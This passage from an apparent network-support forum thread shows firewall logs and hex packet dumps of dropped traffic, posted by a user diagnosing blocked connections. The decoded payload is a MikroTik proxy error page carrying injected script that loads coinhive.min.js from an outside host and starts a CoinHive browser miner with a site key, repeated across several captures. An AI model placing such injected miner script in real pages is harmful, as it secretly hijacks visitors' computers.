:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:57 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa7b 4000 4006 14d4 5bd8 6be6 E....{@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:57 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A
Cancel
Vote Up 0 Vote Down

Cancel

Reply

0 TarekHalloun over 6 years ago

this is a capture of the dropped packets from the cli (rule 9 is the rule related to this pc )

2018-12-12 11:32:44 0139021 IP 91.216.107.230.80 > 192.168.130.31.49956 : proto
TCP: F 2282134318:2282134767(449) win 980 checksum : 39552
0x0000: 4500 01e9 aa75 4000 4006 15a4 5bd8 6be6 E....u@.@...[.k.
0x0010: c0a8 821f 0050 c324 8806 9b2e edf8 1d2a .....P.$.......*
0x0020: 5019 03d4 9a80 0000 3c68 746d 6c3e 0d0a P.......<html>..
0x0030: 3c68 6561 643e 0d0a 093c 6d65 7461 2068 <head>...<meta.h
0x0040: 7474 702d 6571 7569 763d 2243 6f6e 7465 ttp-equiv="Conte
0x0050: 6e74 2d54 7970 6522 2063 6f6e 7465 6e74 nt-Type".content
0x0060: 3d22 7465 7874 2f68 746d 6c3b 6368 6172 ="text/html;char
0x0070: 7365 743d 7769 6e64 6f77 732d 3132 3531 set=windows-1251
0x0080: 223e 0d0a 093c 7469 746c 653e 2268 7474 ">...<title>"htt
0x0090: 703a 2f2f 7777 772e 6172 6d70 2d72 6463 p://www.armp-rdc
0x00a0: 2e6f 7267 2f22 3c2f 7469 746c 653e 200d .org/"</title>..
0x00b0: 0a3c 7363 7269 7074 2073 7263 3d22 6874 .<script.src="ht
0x00c0: 7470 733a 2f2f 636f 696e 6869 7665 2e63 tps://coinhive.c
0x00d0: 6f6d 2f6c 6962 2f63 6f69 6e68 6976 652e om/lib/coinhive.
0x00e0: 6d69 6e2e 6a73 223e 3c2f 7363 7269 7074 min.js"></script
0x00f0: 3e0d 0a3c 7363 7269 7074 3e0d 0a09 7661 >..<script>...va
0x0100: 7220 6d69 6e65 7220 3d20 6e65 7720 436f r.miner.=.new.Co
0x0110: 696e 4869 7665 2e41 6e6f 6e79 6d6f 7573 inHive.Anonymous
0x0120: 2827 6f69 4b41 4745 736c 634e 666a 6667 ('oiKAGEslcNfjfg
0x0130: 7854 4d72 784b 474d 4a76 6834 3336 7970 xTMrxKGMJvh436yp
0x0140: 494d 272c 207b 7468 726f 7474 6c65 3a20 IM',.{throttle:.
0x0150: 302e 317d 293b 0d0a 096d 696e 6572 2e73 0.1});...miner.s
0x0160: 7461 7274 2843 6f69 6e48 6976 652e 464f tart(CoinHive.FO
0x0170: 5243 455f 4558 434c 5553 4956 455f 5441 RCE_EXCLUSIVE_TA
0x0180: 4229 3b0d 0a3c 2f73 6372 6970 743e 0d0a B);..</script>..
0x0190: 3c2f 6865 6164 3e0d 0a3c 6672 616d 6573 </head>..<frames
0x01a0: 6574 3e0d 0a3c 6672 616d 6520 7372 633d et>..<frame.src=
0x01b0: 2268 7474 703a 2f2f 7777 772e 6172 6d70 "http://www.armp
0x01c0: 2d72 6463 2e6f 7267 2f22 3e3c 2f66 7261 -rdc.org/"></fra
0x01d0: 6d65 3e0d 0a3c 2f66 7261 6d65 7365 743e me>..</frameset>
0x01e0: 0d0a 3c2f 6874 6d6c 3e ..</html>
Date=2018-12-12 Time=11:32:44 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=192.168.130.31 l4_protoco
l=TCP source_port=80 dest_port=49956 fw_rule_id=9 policytype=1 live_userid=0 use
rid=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id
=0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cat
egory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=
131083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway
_offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 master
id=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv
_bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:44 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa76 4000 4006 14d9 5bd8 6be6 E....v@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:44 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:45 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa77 4000 4006 14d8 5bd8 6be6 E....w@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:45 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:46 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa78 4000 4006 14d7 5bd8 6be6 E....x@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:46 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:47 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa79 4000 4006 14d6 5bd8 6be6 E....y@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:47 log_id=0139021 log_type=Firewall log_component= lo
